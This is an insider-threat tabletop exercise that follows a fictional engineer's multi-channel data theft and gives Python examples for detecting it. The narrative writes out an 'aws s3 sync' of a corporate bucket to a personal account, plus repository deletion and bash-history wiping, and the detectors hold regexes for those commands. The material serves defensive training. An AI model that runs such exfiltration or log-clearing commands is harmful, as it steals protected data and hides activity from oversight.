SC-017: Insider Threat — Data Exfiltration

Scenario Header

Type: Insider Threat  |  Difficulty: ★★★★☆  |  Duration: 2–3 hours  |  Participants: 4–8

Threat Actor: Insider — departing employee, financially motivated data theft

Primary ATT&CK Techniques: T1567.002 · T1052.001 · T1074.001 · T1048.002 · T1070.004 · T1530 · T1119


Threat Actor Profile

"Alex Chen" is a synthetic persona representing a senior software engineer at TechCorp, a mid-size SaaS company (~2,000 employees) specializing in healthcare analytics. Alex has been with TechCorp for 6 years, holds elevated access to source code repositories, customer databases, and the company's proprietary machine learning models. Alex recently accepted a position at MedAnalytics, a direct competitor, with a start date 30 days out.

Alex's access profile:

| Access | Level | Justification |
|---|---|---|
| GitHub Enterprise | Admin (3 repos), Write (12 repos) | Lead developer on core ML platform |
| AWS S3 | Read/Write to techcorp-ml-models-prod | ML model deployment pipeline |
| Snowflake | Analyst role, access to CUSTOMER_ANALYTICS schema | Ad-hoc data analysis for product development |
| Google Workspace | Full Drive access, external sharing enabled | Collaboration with cross-functional teams |
| Physical access | Badge access to all engineering floors, server room | Senior engineer privileges |

Motivation: Financial and career advancement — Alex intends to bring TechCorp's proprietary ML models and customer dataset insights to the competitor, believing this intellectual property will accelerate their new role and potentially earn a performance bonus.

Insider Threat Indicators (Pre-Incident)

The following behavioral indicators were present in the 30 days before exfiltration but were not correlated by any monitoring system:

  • Accepted competitor offer (HR knew, security was not notified)
  • Accessed 3 repositories outside normal work scope in the past 2 weeks
  • Downloaded 4.2GB from Snowflake — 3x the 90-day average
  • Searched Google Drive for "patent filing", "trade secret", "proprietary algorithm"
  • Connected a personal USB device to the corporate laptop (first time in 18 months)

Scenario Narrative

Phase 1 — Motivation & Reconnaissance (~20 min)

Alex Chen submits a 2-week resignation notice to HR on 2026-01-05. HR processes the resignation and schedules an exit interview for 2026-01-17. HR does not notify the security team or IT about the departure. This is a critical gap — TechCorp's offboarding policy requires HR to notify IT security within 24 hours of a resignation, but the process is manual (email-based) and inconsistently followed.

Between January 5 and January 10, Alex begins reconnaissance — systematically identifying the most valuable data assets accessible through existing credentials. Alex's behavior changes subtly:

  • GitHub: Clones 8 repositories outside normal work scope, including ml-core-engine (proprietary ML framework), customer-scoring-model (HIPAA-regulated customer data models), and patent-pending-algorithms
  • Snowflake: Runs 14 ad-hoc queries against CUSTOMER_ANALYTICS.PATIENT_OUTCOMES — a table Alex has access to but has never queried before
  • Google Drive: Searches for terms including "competitive analysis", "product roadmap 2026", "IP portfolio"

Evidence Artifacts:

| Artifact | Detail |
|---|---|
| HR System (Workday) | Resignation submitted: 2026-01-05 — Last day: 2026-01-17 — IT notification: Not sent |
| GitHub Audit Log | git clone — Repos: ml-core-engine, customer-scoring-model, patent-pending-algorithms + 5 others — User: achen@techcorp.com — 2026-01-06 through 2026-01-08 — 8 repos cloned (baseline: 0 new clones in prior 90 days) |
| Snowflake Query Log | 14 queries against CUSTOMER_ANALYTICS.PATIENT_OUTCOMES — User: ACHEN — Date range: 2026-01-07 to 2026-01-09 — Data scanned: 2.1TB — Results exported: 4.2GB CSV |
| Google Workspace Audit | Drive search queries: "competitive analysis" (3x), "product roadmap 2026" (2x), "IP portfolio" (1x) — User: achen@techcorp.com — 2026-01-08 to 2026-01-10 |

Phase 1 — Discussion Inject

Technical: Alex's Snowflake queries scanned 2.1TB of data from a table they had never previously accessed. What UEBA (User and Entity Behavior Analytics) detection rule would flag this? What baseline would you establish, and what's the threshold for alerting?

Decision: HR failed to notify security about Alex's resignation. This is a process failure, not a technology failure. How do you redesign the offboarding workflow to make security notification automatic and non-bypassable? Should security have real-time access to HR resignation data?

Expected Analyst Actions:

  • [ ] Establish automated HR-to-Security notification for all resignations/terminations
  • [ ] Trigger enhanced monitoring for departing employees — increase log retention and alert sensitivity
  • [ ] Review Alex's access scope — identify data assets accessible and recent access patterns
  • [ ] Baseline Alex's normal data access patterns (prior 90 days) for comparison
  • [ ] Check if Alex has accessed any data classified as HIPAA PHI, trade secret, or confidential
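One answer to the Phase 1 technical inject, as an added example that is not part of the scenario or any vendor's UEBA product: it baselines each user's set of queried tables and mean daily bytes scanned over the prior 90 days from constructed Snowflake query-history rows, then flags first-time table access and days that exceed 3x the baseline, raising severity for users HR has flagged as departing. Column names, the 3x multiplier and the sample volumes are assumptions.

```python
from collections import defaultdict
from datetime import date, timedelta

BASELINE_DAYS = 90
VOLUME_MULTIPLIER = 3.0          # alert when a day scans more than 3x the user's mean
AS_OF = date(2026, 1, 7)         # first day of the window being evaluated

def routine(user, table, nbytes, first_day=date(2025, 10, 10)):
    """Constructed baseline: one query every third day for 90 days."""
    return [(user, first_day + timedelta(days=d), table, nbytes) for d in range(0, 90, 3)]

# Constructed QUERY_HISTORY rows: (user, query_date, table, bytes_scanned)
QUERY_HISTORY = (
    routine("ACHEN", "CUSTOMER_ANALYTICS.FEATURE_USAGE", 8_000_000_000)
    + routine("BLEE", "CUSTOMER_ANALYTICS.FEATURE_USAGE", 9_000_000_000)
    + [  # ACHEN's first-ever queries against PATIENT_OUTCOMES, far above normal volume
        ("ACHEN", date(2026, 1, 7), "CUSTOMER_ANALYTICS.PATIENT_OUTCOMES", 700_000_000_000),
        ("ACHEN", date(2026, 1, 8), "CUSTOMER_ANALYTICS.PATIENT_OUTCOMES", 700_000_000_000),
        ("ACHEN", date(2026, 1, 9), "CUSTOMER_ANALYTICS.PATIENT_OUTCOMES", 700_000_000_000),
        # a routine query by a non-departing analyst on the same day
        ("BLEE", date(2026, 1, 7), "CUSTOMER_ANALYTICS.FEATURE_USAGE", 9_000_000_000),
    ]
)

def build_baseline(history, as_of):
    """Per user: the set of tables touched and the mean bytes scanned per active
    day, over the BASELINE_DAYS window that ends the day before as_of."""
    start = as_of - timedelta(days=BASELINE_DAYS)
    tables = defaultdict(set)
    daily = defaultdict(lambda: defaultdict(int))
    for user, day, table, nbytes in history:
        if start <= day < as_of:
            tables[user].add(table)
            daily[user][day] += nbytes
    mean_daily = {u: sum(d.values()) / len(d) for u, d in daily.items()}
    return tables, mean_daily

def detect_anomalies(history, as_of, departing_users):
    """Alert on queries from as_of onward that touch a table the user has never
    queried, or push the day's scanned volume past VOLUME_MULTIPLIER x baseline.
    Users with no baseline are skipped here (a real system would queue them)."""
    tables, mean_daily = build_baseline(history, as_of)
    volume_today = defaultdict(int)
    alerts = []
    for user, day, table, nbytes in sorted(history, key=lambda r: r[1]):
        if day < as_of or user not in mean_daily:
            continue
        volume_today[(user, day)] += nbytes
        reasons = []
        if table not in tables[user]:
            reasons.append(f"first access to {table}")
        ratio = volume_today[(user, day)] / mean_daily[user]
        if ratio > VOLUME_MULTIPLIER:
            reasons.append(f"daily volume {ratio:.0f}x 90-day mean")
        if reasons:
            severity = "high" if user in departing_users else "medium"
            alerts.append((user, day.isoformat(), severity, reasons))
    return alerts

if __name__ == "__main__":
    for alert in detect_anomalies(QUERY_HISTORY, AS_OF, {"ACHEN"}):
        print(alert)
```

The departing-user set is exactly the feed the scenario says HR never sent; without it the same queries still alert, only at medium severity.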


Phase 2 — Data Staging (~25 min)

Between January 10 and January 14, Alex begins staging data for exfiltration. The staging is methodical and designed to avoid triggering volume-based DLP alerts:

Alex uploads 2.8GB of files to a personal Google Drive account (alex.chen.personal@gmail.com) using TechCorp's Google Workspace — which allows external sharing by default. The uploads are spread across 4 days in small batches (50–200MB each) to avoid triggering the DLP policy, which only alerts on single transfers >500MB.

Files uploaded include:

  • ml-core-engine source code (1.2GB)
  • Snowflake query exports — patient outcome analytics (800MB CSV)
  • Product roadmap documents (340MB)
  • Patent-pending algorithm documentation (460MB)

On 2026-01-12, Alex connects a personal Samsung T7 USB drive (serial: S5PXNG0T123456) to the corporate MacBook Pro. The endpoint DLP agent (CrowdStrike Falcon) logs the USB connection but does not block it — TechCorp's policy allows USB storage for "business purposes" with no enforcement. Alex copies 1.4GB of ML model weights and training data to the USB drive.

On 2026-01-13, Alex prints 47 pages of algorithm documentation and architecture diagrams to the engineering floor printer (HP LaserJet, asset tag PRN-ENG-042). The print audit log captures the job but no content inspection is performed — print DLP is not deployed.

Evidence Artifacts:

| Artifact | Detail |
|---|---|
| Google Workspace DLP | External share: achen@techcorp.com → alex.chen.personal@gmail.com — Files: 23 documents, 2.8GB total — Dates: 2026-01-10 through 2026-01-14 — DLP verdict: No alert (each transfer <500MB threshold) |
| CrowdStrike Falcon | USB device connected: Samsung T7 Portable SSD — Serial: S5PXNG0T123456 — User: achen — Host: TECHCORP-ACHEN-MBP — 2026-01-12T19:47:33Z — Action: Allowed (policy: monitor-only) |
| CrowdStrike Falcon | File copy to removable media: 847 files, 1.4GB — Path: /Users/achen/repos/ml-models/weights/ → /Volumes/Samsung_T7/ — 2026-01-12T19:48:01Z through 2026-01-12T19:52:44Z |
| Print Server Log | Print job: User achen — Printer: PRN-ENG-042 — Pages: 47 — Document: Algorithm_Documentation_v3.pdf — 2026-01-13T17:22:08Z |

Phase 2 — Discussion Inject

Technical: Alex evaded the DLP policy by splitting uploads into batches under the 500MB threshold. This is a classic DLP bypass technique. How would you redesign the DLP policy to detect cumulative exfiltration over time? What role does UEBA play in complementing threshold-based DLP?

Decision: Your USB policy allows storage devices for "business purposes" with no enforcement (monitor-only). The engineering team argues that USB access is necessary for hardware development and testing. How do you implement USB controls that balance security with engineering productivity? Consider: USB device whitelisting, file-type restrictions, encryption requirements.

Expected Analyst Actions:

  • [ ] Review Google Workspace sharing audit for all external shares by achen@techcorp.com in the past 30 days
  • [ ] Analyze CrowdStrike USB device logs — identify all removable media connections for this user
  • [ ] Pull print audit logs for achen — look for unusual print volume or sensitive document names
  • [ ] Calculate total data volume across all exfiltration channels (cloud + USB + print)
  • [ ] Classify the exfiltrated data — determine regulatory exposure (HIPAA, trade secret)
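The Phase 2 technical inject asks how a DLP policy would catch batched uploads; this added example (not TechCorp's DLP product or any vendor's rule syntax) runs constructed Google Workspace external-share events through both the scenario's per-transfer rule and a rolling 7-day per-user cumulative rule, showing that only the second one fires. Event fields, the 1 GB weekly ceiling and the sample batch sizes are assumptions.

```python
from collections import defaultdict
from datetime import datetime, timedelta

MB = 1024 * 1024
PER_TRANSFER_LIMIT = 500 * MB      # the scenario's existing per-transfer DLP rule
CUMULATIVE_LIMIT = 1024 * MB       # assumed per-user ceiling over the trailing window
WINDOW = timedelta(days=7)

# Constructed SHARE_EVENTS rows: (timestamp, sharer, external recipient, bytes).
# achen's batches stay under 200 MB each, as in the scenario narrative.
SHARE_EVENTS = [
    ("2026-01-10T18:02:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 200 * MB),
    ("2026-01-10T18:20:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 180 * MB),
    ("2026-01-11T19:05:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 190 * MB),
    ("2026-01-11T19:30:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 200 * MB),
    ("2026-01-12T18:10:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 150 * MB),
    ("2026-01-12T18:45:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 200 * MB),
    ("2026-01-13T20:00:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 160 * MB),
    ("2026-01-14T18:15:00Z", "achen@techcorp.com", "alex.chen.personal@gmail.com", 200 * MB),
    # one ordinary share to a business partner by another employee
    ("2026-01-11T10:00:00Z", "blee@techcorp.com", "pm@partner.example.org", 120 * MB),
]

def parse_ts(ts):
    return datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")

def per_transfer_alerts(events, limit=PER_TRANSFER_LIMIT):
    """The existing rule: only a single transfer above `limit` fires."""
    return [(ts, user, size) for ts, user, _, size in events if size > limit]

def cumulative_alerts(events, limit=CUMULATIVE_LIMIT, window=WINDOW):
    """Sliding per-user window: fire the first time the external-share bytes
    within the trailing `window` exceed `limit`, whatever the batch size."""
    by_user = defaultdict(list)
    for ts, user, recipient, size in sorted(events, key=lambda e: e[0]):
        by_user[user].append((parse_ts(ts), recipient, size))
    alerts = []
    for user, shares in by_user.items():
        recent = []
        for when, recipient, size in shares:
            recent.append((when, recipient, size))
            recent = [s for s in recent if when - s[0] <= window]  # age out old events
            total = sum(s[2] for s in recent)
            if total > limit:
                alerts.append({"user": user, "at": when.isoformat(),
                               "window_bytes": total, "events": len(recent),
                               "recipients": sorted({s[1] for s in recent})})
                break  # one alert per breach; a production rule would reset the window
    return alerts

if __name__ == "__main__":
    print("per-transfer rule:", per_transfer_alerts(SHARE_EVENTS))
    print("cumulative rule:", cumulative_alerts(SHARE_EVENTS))
```

The recipient list in the alert is what lets UEBA add context the threshold cannot: every byte in the window went to one personal address.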


Phase 3 — Exfiltration & Cover Tracks (~25 min)

On 2026-01-15 (2 days before the last day), Alex executes the final exfiltration and begins covering tracks:

Final Data Exfiltration:

  • Alex uses the AWS CLI from the corporate laptop to sync the techcorp-ml-models-prod S3 bucket to a personal AWS account: aws s3 sync s3://techcorp-ml-models-prod s3://personal-ml-research-2026 --source-region us-east-1 --region eu-west-1. This transfers 8.7GB of production ML model artifacts to an S3 bucket in a different AWS account and region.

Cover Track Attempts:

  • Deletes browser history and clears the Chrome profile
  • Removes locally cloned repositories from the laptop (rm -rf ~/repos/ml-core-engine ~/repos/customer-scoring-model)
  • Revokes the personal Google Drive external share (but the files remain in the personal Drive)
  • Clears bash history (history -c && rm ~/.bash_history)
  • Empties the Trash on the MacBook

What Alex Doesn't Know:

  • CrowdStrike Falcon records all file deletions and command-line activity — the rm -rf commands are fully logged
  • AWS CloudTrail logs the S3 sync operation with source and destination bucket names
  • Google Workspace retains sharing audit logs for 180 days even after shares are revoked
  • The corporate laptop's Time Machine backup (to a network share) captured a snapshot 4 hours before file deletion

Evidence Artifacts:

| Artifact | Detail |
|---|---|
| AWS CloudTrail | S3:ListObjects + S3:GetObject × 2,847 — Source: techcorp-ml-models-prod — User: achen-dev (IAM user) — Source IP: 192.168.1.47 (corporate VPN) — 2026-01-15T21:14:22Z |
| AWS CloudTrail | S3:PutObject × 2,847 — Destination: personal-ml-research-2026 — Account: 198765432109 (not TechCorp) — Region: eu-west-1 — Total: 8.7GB — 2026-01-15T21:14:22Z through 21:38:47Z |
| CrowdStrike Falcon | Process: /bin/rm -rf /Users/achen/repos/ml-core-engine — User: achen — 2026-01-15T22:01:33Z |
| CrowdStrike Falcon | Process: /bin/bash -c 'history -c && rm ~/.bash_history' — User: achen — 2026-01-15T22:03:14Z |
| Google Workspace Audit | External share revoked: achen@techcorp.com → alex.chen.personal@gmail.com — 23 documents — 2026-01-15T22:10:44Z — Original share audit entries retained |

Phase 3 — Discussion Inject

Technical: Alex attempted to cover tracks by deleting files and clearing bash history. CrowdStrike Falcon captured all of this activity. What specific EDR telemetry captures file deletion and command-line history clearing? How would you use these anti-forensic actions as positive indicators of malicious intent?

Decision: The AWS CloudTrail logs show that Alex synced 8.7GB from a corporate S3 bucket to a personal AWS account. You need to (1) revoke Alex's AWS access immediately, but Alex is still an active employee for 2 more days, and (2) determine if you can legally access Alex's personal AWS account to verify what data was taken. What are the legal boundaries? Does your employment agreement include IP assignment and data return clauses?

Expected Analyst Actions:

  • [ ] Immediately disable Alex's AWS IAM credentials (aws iam update-access-key --status Inactive)
  • [ ] Preserve CloudTrail logs with S3 Object Lock to prevent tampering
  • [ ] Capture a forensic image of Alex's corporate laptop before it's returned
  • [ ] Initiate legal hold on all of Alex's corporate data (email, Drive, Slack)
  • [ ] Contact legal counsel regarding the personal AWS account and data recovery options
  • [ ] Document the anti-forensic activity as evidence of intent
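The cross-account S3 sync is called an "Easy" detection in the Detection Opportunities table; this added example (not TechCorp's SIEM content) shows the logic over constructed CloudTrail S3 data-event records: a burst of PutObject calls into a bucket whose owning account is outside the organization, paired with the same identity's preceding GetObject reads from a corporate bucket. The field names follow CloudTrail's record layout; the account IDs, burst threshold and record counts are constructed.

```python
from collections import defaultdict

CORPORATE_ACCOUNTS = {"123456789012"}   # constructed TechCorp account id
BURST_THRESHOLD = 100                   # PutObject calls to one foreign bucket before alerting

def make_record(event_name, user, bucket, bucket_account, when):
    """Constructed CloudTrail S3 data-event record, trimmed to the fields read below
    (eventName, userIdentity, requestParameters.bucketName, resources[].accountId).
    Such records reach the caller's trail only if S3 data events are enabled there."""
    return {
        "eventTime": when, "eventSource": "s3.amazonaws.com", "eventName": event_name,
        "userIdentity": {"type": "IAMUser", "userName": user},
        "requestParameters": {"bucketName": bucket},
        "resources": [{"type": "AWS::S3::Bucket", "ARN": f"arn:aws:s3:::{bucket}",
                       "accountId": bucket_account}],
    }

def stamp(minute, i):
    return f"2026-01-15T21:{minute + i // 60:02d}:{i % 60:02d}Z"

# Constructed sample: a read burst from the corporate bucket, a matching write burst
# to a bucket owned by a foreign account, and one legitimate in-account write.
EVENTS = (
    [make_record("GetObject", "achen-dev", "techcorp-ml-models-prod", "123456789012", stamp(14, i)) for i in range(120)]
    + [make_record("PutObject", "achen-dev", "personal-ml-research-2026", "198765432109", stamp(16, i)) for i in range(120)]
    + [make_record("PutObject", "ci-deployer", "techcorp-ml-models-prod", "123456789012", "2026-01-15T21:30:00Z")]
)

def bucket_owners(record):
    return {r["accountId"] for r in record.get("resources", []) if r.get("type") == "AWS::S3::Bucket"}

def detect_cross_account_copy(events, corporate=CORPORATE_ACCOUNTS, threshold=BURST_THRESHOLD):
    """Flag an identity that writes `threshold` or more objects into a bucket owned
    outside `corporate`, and record whether it read corporate objects first, which
    distinguishes a bulk copy from a stray write to a partner bucket."""
    foreign_puts = defaultdict(list)
    corporate_reads = defaultdict(int)
    for ev in events:
        user = ev["userIdentity"].get("userName", "unknown")
        owners = bucket_owners(ev)
        if not owners:
            continue  # ownership unknown; a production rule would enrich from inventory
        if ev["eventName"] == "GetObject" and owners <= corporate:
            corporate_reads[user] += 1
        elif ev["eventName"] == "PutObject" and not owners <= corporate:
            key = (user, ev["requestParameters"]["bucketName"], ",".join(sorted(owners)))
            foreign_puts[key].append(ev["eventTime"])
    alerts = []
    for (user, bucket, account), times in foreign_puts.items():
        if len(times) >= threshold:
            alerts.append({"user": user, "destination_bucket": bucket,
                           "destination_account": account, "put_count": len(times),
                           "first": min(times), "last": max(times),
                           "read_corporate_objects": corporate_reads[user]})
    return alerts

if __name__ == "__main__":
    for alert in detect_cross_account_copy(EVENTS):
        print(alert)
```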


Phase 4 — Detection & Investigation (~30 min)

On 2026-01-19 (2 days after Alex's last day), the security team receives a UEBA alert from Microsoft Sentinel: "Anomalous data access pattern — departing employee". The alert fires because the UEBA system finally received the HR departure notification (sent manually by HR on January 16 — 11 days after the resignation) and retroactively correlated it with Alex's data access patterns.

The security team launches a formal insider threat investigation:

| Date | Activity | Volume | Channel |
|---|---|---|---|
| Jan 5 | Resignation submitted | | HR |
| Jan 6–8 | GitHub: 8 repos cloned | 3.1GB | Git over HTTPS |
| Jan 7–9 | Snowflake: 14 queries, CSV export | 4.2GB | Snowflake UI |
| Jan 8–10 | Drive: searches for sensitive terms | | Google Workspace |
| Jan 10–14 | Drive: external sharing to personal Gmail | 2.8GB | Google Workspace |
| Jan 12 | USB: file copy to Samsung T7 | 1.4GB | USB removable media |
| Jan 13 | Print: algorithm documentation | 47 pages | Network printer |
| Jan 15 | AWS S3: sync to personal account | 8.7GB | AWS CLI |
| Jan 15 | Cover tracks: file deletion, history clear | | Local MacBook |
| Total | | ~20.2GB + 47 pages | 5 channels |

  • HIPAA: Snowflake export included PATIENT_OUTCOMES table with de-identified but re-identifiable patient data — potential HIPAA breach if data is combined with other datasets
  • Trade Secret: ML model weights and patent-pending algorithms constitute trade secrets under the Defend Trade Secrets Act (DTSA)
  • Employment Agreement: Alex's employment agreement includes IP assignment clause and return-of-materials obligation
  • Computer Fraud: Unauthorized S3 sync to personal account may violate the Computer Fraud and Abuse Act (CFAA)

  • Legal hold issued on: Alex's email, Drive, Slack, GitHub activity, Snowflake query logs
  • Forensic image: MacBook Pro captured on 2026-01-17 (last day) — chain of custody form signed
  • Evidence preservation: CloudTrail, Google Workspace audit, CrowdStrike telemetry exported to write-once storage
  • Outside counsel: engaged 2026-01-19 — attorney-client privilege established for investigation

Evidence Artifacts:

| Artifact | Detail |
|---|---|
| Microsoft Sentinel | UEBA Alert: "Anomalous data access — departing employee" — User: achen@techcorp.com — Risk score: 94/100 — Triggered: 2026-01-19T08:14:00Z — Factors: departure + volume anomaly + external sharing + USB + S3 cross-account transfer |
| Forensic Image | MacBook Pro — Serial: C02FG123XXXX — Image hash (SHA-256): a3f7c2e1... — Captured by: Digital Forensics team — 2026-01-17T16:30:00Z |
| Legal Hold Notice | Custodians: Alex Chen, HR Manager, direct supervisor — Scope: all electronic communications and data access logs — Issued: 2026-01-19 |
| Time Machine Backup | Network snapshot from 2026-01-15T18:00:00Z — Contains all files before deletion — Verified against forensic image |

Phase 4 — Discussion Inject

Technical: The UEBA alert fired on January 19 — 14 days after the resignation and 2 days after Alex's departure. What data sources would you integrate into UEBA to enable earlier detection? How would you reduce the HR notification delay from 11 days to near-real-time?

Decision: You now have evidence that Alex exfiltrated ~20GB of data including trade secrets and potentially HIPAA-regulated data. You must decide: (1) Pursue criminal referral (CFAA, trade secret theft) vs. civil litigation (breach of employment agreement, injunctive relief to return data), or both? (2) Report to HHS/OCR as a potential HIPAA breach? (3) Notify the competitor (MedAnalytics) that their new hire may possess your trade secrets? Each decision has significant legal, reputational, and business implications.

Expected Analyst Actions:

  • [ ] Complete full data exfiltration inventory — classify every file by sensitivity level
  • [ ] Verify forensic image integrity — confirm chain of custody documentation
  • [ ] Prepare investigation report for legal counsel — include timeline, evidence, and regulatory exposure
  • [ ] Assess HIPAA breach notification requirements — was PHI involved?
  • [ ] Coordinate with HR on employment agreement enforcement — IP return clause
  • [ ] Brief executive leadership on incident scope, financial exposure, and recommended legal actions


Detection Opportunities

| Phase | Technique | ATT&CK | Detection Method | Difficulty |
|---|---|---|---|---|
| 1 | Abnormal repo cloning | T1213 | GitHub audit: repos cloned outside normal work scope | Medium |
| 1 | Unusual database queries | T1530 | Snowflake: queries to never-before-accessed tables by departing employee | Medium |
| 2 | External cloud sharing | T1567.002 | Google Workspace DLP: cumulative external sharing volume (not per-transfer) | Medium |
| 2 | USB file copy | T1052.001 | EDR: removable media file write by departing employee | Easy |
| 2 | Suspicious printing | T1074.001 | Print audit: volume anomaly + sensitive document keywords | Hard |
| 3 | Cross-account S3 sync | T1537 | CloudTrail: PutObject to S3 bucket in non-corporate AWS account | Easy |
| 3 | Anti-forensic activity | T1070.004 | EDR: rm -rf on repo directories + bash history clearing | Easy |
| 4 | UEBA correlation | | Departing employee + multi-channel data access anomaly | Medium |

Investigation Procedure

HR Coordination:

  • [ ] Confirm resignation date and notice period with HR
  • [ ] Review employment agreement — identify IP assignment, non-compete, and return-of-materials clauses
  • [ ] Coordinate with HR on investigation communication — avoid alerting the subject prematurely
  • [ ] Schedule exit interview to include security questionnaire (if subject hasn't departed)

Chain of Custody:

  • [ ] Forensic image of all corporate devices — document hash values and imaging process
  • [ ] Preserve all electronic evidence in write-once storage with access controls
  • [ ] Maintain detailed investigation log — who accessed what evidence, when, and why
  • [ ] Engage digital forensics firm if criminal referral is anticipated

Legal Hold:

  • [ ] Issue legal hold notice to all relevant custodians (subject, managers, HR, IT)
  • [ ] Preserve email, chat, cloud storage, and database access logs
  • [ ] Disable auto-deletion policies for the subject's accounts
  • [ ] Engage outside counsel before making any criminal or civil referral decisions

Regulatory Notification:

  • [ ] Assess HIPAA breach notification requirements (if PHI involved) — 60-day notification window
  • [ ] Assess state data breach notification laws — requirements vary by jurisdiction
  • [ ] Document all notification decisions and rationale for legal defensibility

Key Discussion Questions

  1. HR did not notify security about Alex's resignation for 11 days. How do you build an automated, reliable HR-to-Security notification pipeline? What systems should integrate?
  2. Alex used 5 different exfiltration channels (cloud sharing, USB, print, S3, Git). How do you build a unified DLP strategy that covers all channels without creating an oppressive monitoring environment?
  3. The DLP policy was threshold-based (>500MB per transfer). Alex bypassed it by splitting transfers. What alternative detection approaches (UEBA, cumulative scoring, behavioral baselines) would catch this pattern?
  4. Alex's anti-forensic activity (deleting files, clearing history) is itself an indicator of malicious intent. How do you use cover-track behavior as a detection signal without triggering false positives from legitimate housekeeping?
  5. What are the ethical boundaries of insider threat monitoring? How do you balance employee privacy with corporate data protection, particularly in jurisdictions with strong privacy laws (GDPR, CCPA)?
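The Phase 3 technical inject and question 4 both ask how cover-track behaviour can be used as an intent signal without firing on ordinary housekeeping. This added example (not CrowdStrike's own detection content) scores constructed EDR process events: one `rm -rf` or one cleared shell history alone never alerts; only two distinct anti-forensic behaviours inside a 30-minute window, weighted higher for repository trees and for HR-flagged departing users, cross the threshold. The regexes, paths, weights and window are assumptions.

```python
import re
from datetime import datetime, timedelta

WINDOW = timedelta(minutes=30)   # behaviours must cluster within this span
ALERT_SCORE = 5                  # assumed weighted-score threshold
DEPARTING_BONUS = 2              # added when HR has flagged the user as departing

# (regex over the process command line, behaviour label, weight)
RULES = [
    (re.compile(r"\brm\s+-\w*r\w*\s+\S*/repos/"), "repo_tree_deleted", 3),
    (re.compile(r"\bhistory\s+-c\b"), "shell_history_cleared", 2),
    (re.compile(r"\brm\b.*\.(bash|zsh)_history\b"), "shell_history_file_removed", 2),
]

# Constructed PROCESS_EVENTS rows: (timestamp, user, command line)
PROCESS_EVENTS = [
    ("2026-01-15T22:01:33Z", "achen", "/bin/rm -rf /Users/achen/repos/ml-core-engine /Users/achen/repos/customer-scoring-model"),
    ("2026-01-15T22:03:14Z", "achen", "/bin/bash -c 'history -c && rm ~/.bash_history'"),
    # ordinary housekeeping by another engineer: one repo removed, history cleared a day earlier
    ("2026-01-15T09:12:00Z", "blee", "/bin/rm -rf /Users/blee/repos/old-prototype"),
    ("2026-01-14T08:00:00Z", "blee", "/bin/bash -c 'history -c'"),
]

def classify(cmdline):
    """Return every anti-forensic behaviour the command line matches."""
    return [(label, weight) for rx, label, weight in RULES if rx.search(cmdline)]

def score_anti_forensics(events, departing_users, window=WINDOW, threshold=ALERT_SCORE):
    """Alert only when a user shows at least two distinct behaviours inside the
    trailing window and the weighted score reaches the threshold."""
    hits = {}
    for ts, user, cmd in sorted(events):
        when = datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ")
        for label, weight in classify(cmd):
            hits.setdefault(user, []).append((when, label, weight))
    alerts = []
    for user, user_hits in hits.items():
        for i, (when, _, _) in enumerate(user_hits):
            recent = [h for h in user_hits[: i + 1] if when - h[0] <= window]
            labels = {h[1] for h in recent}
            score = sum(h[2] for h in recent) + (DEPARTING_BONUS if user in departing_users else 0)
            if len(labels) >= 2 and score >= threshold:
                alerts.append({"user": user, "at": when.isoformat(),
                               "behaviours": sorted(labels), "score": score})
                break
    return alerts

if __name__ == "__main__":
    print(score_anti_forensics(PROCESS_EVENTS, departing_users={"achen"}))
```

Pairing the rule with a baseline of how often each engineer normally removes repositories would lower the false-positive rate further; the sample keeps that out for brevity.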

Debrief Guide

What Went Well

  • CrowdStrike Falcon captured comprehensive endpoint telemetry — including USB, file deletion, and command-line activity
  • AWS CloudTrail logged the cross-account S3 sync with full detail — forensic reconstruction was straightforward
  • Time Machine backup provided a recovery point for deleted files — defense in depth worked

Key Learning Points

  • HR-Security integration is the #1 insider threat control gap — departing employees must trigger enhanced monitoring automatically
  • Threshold-based DLP is easily bypassed — cumulative, behavioral, and contextual DLP is required
  • Multi-channel exfiltration is common — insiders use whatever channel is available and least monitored
  • Anti-forensic activity is a high-fidelity indicator — employees don't normally rm -rf entire repo directories and clear bash history
  • Legal preparation must precede investigation — chain of custody, legal hold, and privilege considerations are critical from day one

  • [ ] Implement automated HR → Security notification via API integration (Workday → SIEM/SOAR)
  • [ ] Deploy UEBA with specific departing-employee behavioral models
  • [ ] Enforce USB device control — block unauthorized removable media or require encryption
  • [ ] Implement cumulative DLP policies — track total data volume per user per week, not just per transfer
  • [ ] Enable print DLP — content inspection for sensitive document markers
  • [ ] Restrict S3 cross-account operations via SCP — block PutObject to non-corporate accounts
  • [ ] Add insider threat scenarios to annual security awareness training
  • [ ] Conduct quarterly access reviews for departing employees with elevated privileges
